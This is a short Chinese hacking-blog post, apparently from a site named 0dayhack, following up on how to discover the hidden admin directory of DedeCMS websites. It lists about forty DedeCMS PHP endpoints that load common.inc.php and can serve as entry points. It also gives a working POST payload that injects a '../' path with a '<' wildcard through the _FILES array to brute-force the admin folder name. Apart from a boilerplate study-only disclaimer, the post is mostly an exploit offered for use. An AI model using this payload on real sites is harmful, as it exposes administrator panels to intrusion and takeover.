DedeCMS找后台目录后续 - 颓废's Blog

DedeCMS找后台目录后续

  • 内容
  • 相关

现在好多朋友在聊天的时候说的意思就是   现在后台好多都无法查找到了

tags.php和index.php不能跑了  那不是没戏


了解详情请访问

https://www.0dayhack.com/post-801.html

其实在上一文中都解释过吧

核心文件common.inc.php

只要是包含了他都可以跑  


总结了一下


/install/module_autos.php
/m/index.php
/m/list.php
/m/view.php
/member/config.php
/plus/ad_js.php
/plus/advancedsearch.php
/plus/arcmulti.php
/plus/bookfeedback.php
/plus/bookfeedback_js.php
/plus/car.php
/plus/carbuyaction.php
/plus/comments_frame.php
/plus/count.php
/plus/digg_ajax.php
/plus/digg_frame.php
/plus/disdls.php
/plus/diy.php
/plus/download.php
/plus/erraddsave.php
/plus/feedback.php
/plus/feedback_ajax.php
/plus/feedback_js.php
/plus/flink.php
/plus/flink_add.php
/plus/freelist.php
/plus/guestbook.php
/plus/heightsearch.php
/plus/list.php
/plus/mytag_js.php
/plus/posttocar.php
/plus/qrcode.php
/plus/recommend.php
/plus/rss.php
/plus/search.php
/plus/showphoto.php
/plus/stow.php
/plus/task.php
/plus/view.php
/plus/vote.php
二级目录爆破的话改下exp就好了



dopost=save&_FILES[b4dboy][tmp_name]=../$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif


本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:DedeCMS找后台目录后续 - https://www.0dayhack.com/post-802.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注